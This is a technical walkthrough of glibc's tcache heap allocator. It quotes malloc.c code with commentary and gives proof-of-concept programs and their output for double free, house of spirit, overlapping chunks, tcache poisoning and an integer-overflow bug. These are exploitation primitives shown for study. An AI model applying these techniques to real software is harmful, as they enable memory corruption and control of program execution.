#if USE_TCACHE
/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS		64
# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables.  */
# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)

/* When "x" is from chunksize().  */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size.  */
# define usize2tidx(x) csize2tidx (request2size (x))

/* With rounding and alignment, the bins are...
   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
   idx 1   bytes 25..40 or 13..20
   idx 2   bytes 41..56 or 21..28
   etc.  */

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif
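To make the index arithmetic concrete, here is a small standalone sketch, assuming the usual 64-bit constants (SIZE_SZ = 8, MALLOC_ALIGNMENT = 16, MINSIZE = 32); the constants are hard-coded here for illustration and are not pulled from malloc.c:

#include <stdio.h>

#define SIZE_SZ          8   /* assumed: 64-bit */
#define MALLOC_ALIGNMENT 16
#define MINSIZE          32
#define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
#define csize2tidx(x)   (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)

int main(void) {
  /* Consecutive 0x10-spaced chunk sizes map to consecutive bins. */
  for (size_t csz = 0x20; csz <= 0x50; csz += 0x10)
    printf("chunk size %#zx -> idx %zu (largest user size %zu)\n",
           csz, csize2tidx(csz), tidx2usize(csize2tidx(csz)));
  /* The largest tcache-able request: idx 63 -> 1032 bytes (a 0x410 chunk). */
  printf("MAX_TCACHE_SIZE = %zu\n", tidx2usize(64 - 1));
}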
/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
static __thread tcache_perthread_struct *tcache = NULL;
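On 64-bit the whole per-thread structure really is small: 64 one-byte counts plus 64 eight-byte pointers, 576 (0x240) bytes in total. A quick standalone check, mirroring the two structs above purely for the size arithmetic:

#include <stdio.h>

#define TCACHE_MAX_BINS 64

typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry;
typedef struct tcache_perthread_struct {
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

int main(void) {
  /* 64 + 64*8 = 576 = 0x240 on a 64-bit target. */
  printf("sizeof(tcache_perthread_struct) = %#zx\n",
         sizeof(tcache_perthread_struct));
}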
static void
tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct);

  if (tcache_shutting_down)
    return;

  arena_get (ar_ptr, bytes);
  victim = _int_malloc (ar_ptr, bytes);
  if (!victim && ar_ptr != NULL)
    {
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }

  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  /* In a low memory situation, we may not be able to allocate memory
     - in which case, we just keep trying later.  However, we
     typically do this very early, so either there is sufficient
     memory, or there isn't enough memory to do non-trivial
     allocations anyway.  */
  if (victim)
    {
      tcache = (tcache_perthread_struct *) victim;
      memset (tcache, 0, sizeof (tcache_perthread_struct));
    }
}
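Note that tcache_init allocates the structure with _int_malloc, so tcache_perthread_struct itself lives on the heap, as the very first chunk of a fresh arena. A hedged sketch of what that implies for the layout, assuming a 64-bit glibc 2.26 main arena (0x250 being the chunk that holds the 0x240-byte struct):

#include <stdio.h>
#include <stdlib.h>

int main(void) {
  /* The first user allocation lands right after the tcache chunk, so on
     the assumed layout the struct's user data sits 0x250 bytes below it. */
  void *p = malloc(0x10);
  fprintf(stderr, "first allocation:               %p\n", p);
  fprintf(stderr, "likely tcache_perthread_struct: %p\n",
          (void *) ((char *) p - 0x250));
}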
#if USE_TCACHE
      /* While we're here, if we see other chunks of the same size,
         stash them in the tcache.  */
      size_t tc_idx = csize2tidx (nb);
      if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks.  */
          while (tcache->counts[tc_idx] < mp_.tcache_count
                 && (tc_victim = *fb) != NULL)
            {
              if (SINGLE_THREAD_P)
                *fb = tc_victim->fd;
              else
                {
                  REMOVE_FB (fb, pp, tc_victim);
                  if (__glibc_unlikely (tc_victim == NULL))
                    break;
                }
              tcache_put (tc_victim, tc_idx);
            }
        }
#endif
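This stashing is observable from user space. A hedged demo (assuming a 64-bit glibc with tcache and default tunables, i.e. tcache_count = 7): free nine same-size chunks so seven land in the tcache and two in the fastbin, then reallocate and watch the fastbin remainder get pulled back through the tcache:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
  void *p[9];
  for (int i = 0; i < 9; i++)
    p[i] = malloc(0x18);          /* 0x20 chunks: fastbin-sized */
  for (int i = 0; i < 9; i++)
    free(p[i]);                   /* p[0..6] -> tcache, p[7..8] -> fastbin */
  /* Expected order: p[6]..p[0] (tcache LIFO), then p[8] (fastbin head);
     p[7] is stashed into the tcache during the fastbin take, so it
     comes back last. */
  for (int i = 0; i < 9; i++)
    fprintf(stderr, "malloc %d: %p\n", i, malloc(0x18));
}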
#if USE_TCACHE
      /* While we're here, if we see other chunks of the same size,
         stash them in the tcache.  */
      size_t tc_idx = csize2tidx (nb);
      if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks over.  */
          while (tcache->counts[tc_idx] < mp_.tcache_count
                 && (tc_victim = last (bin)) != bin)
            {
              if (tc_victim != 0)
                {
                  bck = tc_victim->bk;
                  set_inuse_bit_at_offset (tc_victim, nb);
                  if (av != &main_arena)
                    set_non_main_arena (tc_victim);
                  bin->bk = bck;
                  bck->fd = bin;

                  tcache_put (tc_victim, tc_idx);
                }
            }
        }
#endif
#if USE_TCACHE
          /* Fill cache first, return to user only if cache fills.
             We may return one of these chunks later.  */
          if (tcache_nb
              && tcache->counts[tc_idx] < mp_.tcache_count)
            {
              tcache_put (victim, tc_idx);
              return_cached = 1;
              continue;
            }
          else
            {
#endif
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  checked_request2size (bytes, tbytes);
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif
#if USE_TCACHE
      /* If we've processed as many chunks as we're allowed while
         filling the cache, return one of the cached ones.  */
      ++tcache_unsorted_count;
      if (return_cached
          && mp_.tcache_unsorted_limit > 0
          && tcache_unsorted_count > mp_.tcache_unsorted_limit)
        {
          return tcache_get (tc_idx);
        }
#endif
.tcache_unsorted_limit = 0 /* No limit. */
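That default comes from the static initializer of malloc_par (mp_) in malloc.c, so out of the box there is no cap on how many unsorted chunks get stashed. On builds with tunables enabled, it can be overridden at run time via the GLIBC_TUNABLES environment variable; the value 8 below is an arbitrary example:

$ GLIBC_TUNABLES=glibc.malloc.tcache_unsorted_limit=8 ./app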
#if USE_TCACHE
      /* If all the small chunks we found ended up cached, return one now.  */
      if (return_cached)
        {
          return tcache_get (tc_idx);
        }
#endif
/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}
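Each bin is thus a plain singly linked LIFO stack threaded through the chunks' user data, with no integrity checks on either path. A minimal user-space model of the two routines above (a standalone sketch, not glibc code; the model_ names are made up):

#include <stdio.h>
#include <stdlib.h>

typedef struct entry { struct entry *next; } entry;
static entry *bin;   /* models tcache->entries[tc_idx] */
static char count;   /* models tcache->counts[tc_idx] */

static void model_put(void *mem) {
  entry *e = mem;    /* overlay the link on the user-data area */
  e->next = bin;
  bin = e;
  ++count;
}

static void *model_get(void) {
  entry *e = bin;    /* no check that the bin is non-empty or sane */
  bin = e->next;
  --count;
  return e;
}

int main(void) {
  void *a = malloc(32), *b = malloc(32);
  model_put(a);
  model_put(b);                        /* bin: b -> a */
  printf("%d\n", model_get() == b);    /* 1: most recent "free" first */
  printf("%d\n", model_get() == a);    /* 1 */
}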
#include <stdlib.h>
#include <stdio.h>
int main() {
  void *p1 = malloc(0x10);
  fprintf(stderr, "1st malloc(0x10): %p\n", p1);
  fprintf(stderr, "Freeing the first one\n");
  free(p1);
  fprintf(stderr, "Freeing the first one again\n");
  free(p1);
  fprintf(stderr, "2nd malloc(0x10): %p\n", malloc(0x10));
  fprintf(stderr, "3rd malloc(0x10): %p\n", malloc(0x10));
}
$ ./tcache_dup
1st malloc(0x10): 0x56088c39f260
Freeing the first one
Freeing the first one again
2nd malloc(0x10): 0x56088c39f260
3rd malloc(0x10): 0x56088c39f260
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
  malloc(1);  // init heap

  fprintf(stderr, "We will overwrite a pointer to point to a fake 'smallbin' region.\n");

  unsigned long long *a, *b;
  unsigned long long fake_chunk[64] __attribute__ ((aligned (16)));

  fprintf(stderr, "The chunk: %p\n", &fake_chunk[0]);

  fake_chunk[1] = 0x110;  // the size
  memset(fake_chunk+2, 0x41, sizeof(fake_chunk)-0x10);

  fprintf(stderr, "Overwriting our pointer with the address of the fake region inside the fake chunk, %p.\n", &fake_chunk[0]);
  a = &fake_chunk[2];

  fprintf(stderr, "Freeing the overwritten pointer.\n");
  free(a);

  fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunk[0], &fake_chunk[2]);
  b = malloc(0x100);
  memset(fake_chunk+2, 0x42, sizeof(fake_chunk)-0x10);
  fprintf(stderr, "malloc(0x100): %p\n", b);
}
$ ./tcache_house_of_spirit
We will overwrite a pointer to point to a fake 'smallbin' region.
The chunk: 0x7fffffffdb00
Overwriting our pointer with the address of the fake region inside the fake chunk, 0x7fffffffdb00.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7fffffffdb00, which will be 0x7fffffffdb10!
malloc(0x100): 0x7fffffffdb10
gdb-peda$ p b
$1 = (unsigned long long *) 0x7fffffffdae0
gdb-peda$ p a
$2 = (unsigned long long *) 0x7fffffffdae0
gdb-peda$ x/10gx fake_chunk
0x7fffffffdad0: 0x0000000000000000 0x0000000000000110 <-- new chunk
0x7fffffffdae0: 0x4242424242424242 0x4242424242424242
0x7fffffffdaf0: 0x4242424242424242 0x4242424242424242
0x7fffffffdb00: 0x4242424242424242 0x4242424242424242
0x7fffffffdb10: 0x4242424242424242 0x4242424242424242
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
int main() {
  intptr_t *p1, *p2, *p3;

  p1 = malloc(0x50 - 8);
  p2 = malloc(0x20 - 8);
  memset(p1, 0x41, 0x50 - 8);
  memset(p2, 0x41, 0x20 - 8);
  fprintf(stderr, "Allocated victim chunk with requested size 0x48: %p\n", p1);
  fprintf(stderr, "Allocated sentry element after victim: %p\n", p2);

  int evil_chunk_size = 0x110;
  int evil_region_size = 0x110 - 8;
  fprintf(stderr, "Emulating corruption of the victim's size to 0x110\n");
  *(p1 - 1) = evil_chunk_size;

  fprintf(stderr, "Freed victim chunk to put it in a different tcache bin\n");
  free(p1);

  p3 = malloc(evil_region_size);
  memset(p3, 0x42, evil_region_size);
  fprintf(stderr, "Requested a chunk of 0x108 bytes\n");
  fprintf(stderr, "p3: %p ~ %p\n", p3, (char *)p3 + evil_region_size);
  fprintf(stderr, "p2: %p ~ %p\n", p2, (char *)p2 + 0x20 - 8);
}
$ ./tcache_overlapping_chunks
Allocated victim chunk with requested size 0x48: 0x555555756260
Allocated sentry element after victim: 0x5555557562b0
Emulating corruption of the victim's size to 0x110
Freed victim chunk to put it in a different tcache bin
Requested a chunk of 0x108 bytes
p3: 0x555555756260 ~ 0x555555756368
p2: 0x5555557562b0 ~ 0x5555557562c8
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
int main() {
  intptr_t *p1, *p2, *p3;
  size_t target[10];

  fprintf(stderr, "Our target is a stack region at %p\n", (void *)target);

  p1 = malloc(0x30);
  memset(p1, 0x41, 0x30 + 8);
  fprintf(stderr, "Allocated victim chunk with requested size 0x30 at %p\n", p1);

  fprintf(stderr, "Freed victim chunk to put it in a tcache bin\n");
  free(p1);

  fprintf(stderr, "Emulating corruption of the next ptr\n");
  *p1 = (intptr_t)target;

  fprintf(stderr, "Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target\n");
  p2 = malloc(0x30);
  memset(p2, 0x42, 0x30 + 8);
  p3 = malloc(0x30);
  memset(p3, 0x42, 0x30 + 8);
  fprintf(stderr, "The first malloc(0x30) returned %p, the second one: %p\n", p2, p3);
}
$ ./tcache_poisoning
Our target is a stack region at 0x7fffffffdcc0
Allocated victim chunk with requested size 0x30 at 0x555555756670
Freed victim chunk to put it in a tcache bin
Emulating corruption of the next ptr
Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target
The first malloc(0x30) returned 0x555555756670, the second one: 0x7fffffffdcc0
$ git show 34697694e8a93b325b18f25f7dcded55d6baeaf6 malloc/malloc.c | cat
commit 34697694e8a93b325b18f25f7dcded55d6baeaf6
Author: Arjun Shankar <arjun@redhat.com>
Date:   Thu Nov 30 13:31:45 2017 +0100

    Fix integer overflow in malloc when tcache is enabled [BZ #22375]

    When the per-thread cache is enabled, __libc_malloc uses request2size (which
    does not perform an overflow check) to calculate the chunk size from the
    requested allocation size. This leads to an integer overflow causing malloc
    to incorrectly return the last successfully allocated block when called with
    a very large size argument (close to SIZE_MAX).

    This commit uses checked_request2size instead, removing the overflow.

diff --git a/malloc/malloc.c b/malloc/malloc.c
index 79f0e9eac7..0c9e0748b4 100644
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -3031,7 +3031,8 @@ __libc_malloc (size_t bytes)
     return (*hook)(bytes, RETURN_ADDRESS (0));
 #if USE_TCACHE
   /* int_free also calls request2size, be careful to not pad twice.  */
-  size_t tbytes = request2size (bytes);
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
   size_t tc_idx = csize2tidx (tbytes);

   MAYBE_INIT_TCACHE ();
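The pre-fix behavior is easy to trigger. A hedged sketch (only meaningful on a 64-bit glibc 2.26 before this commit; on fixed versions the huge request correctly fails): request2size(SIZE_MAX - 8) wraps around and is clamped to MINSIZE, i.e. tcache bin 0, so if that bin holds a freed chunk the absurd request appears to succeed:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void) {
  void *a = malloc(16);  /* bin 0 covers requests up to 24 bytes */
  free(a);               /* a now sits in tcache bin 0 */
  /* Pre-fix: tbytes wraps, tc_idx == 0, and the stale chunk is returned.
     Post-fix: checked_request2size rejects the request and this prints (nil). */
  void *b = malloc(SIZE_MAX - 8);
  printf("malloc(SIZE_MAX - 8) = %p (a was %p)\n", b, a);
}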